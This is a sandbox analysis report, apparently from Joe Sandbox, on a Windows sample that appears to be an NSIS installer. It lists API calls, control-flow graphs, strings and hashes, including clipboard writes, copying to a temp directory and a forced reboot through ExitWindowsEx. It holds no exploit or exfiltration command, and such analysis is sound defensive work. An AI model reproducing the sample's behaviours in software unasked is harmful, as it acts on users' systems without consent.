                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID: jF
                                                                                                                                                                                                                                                                • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
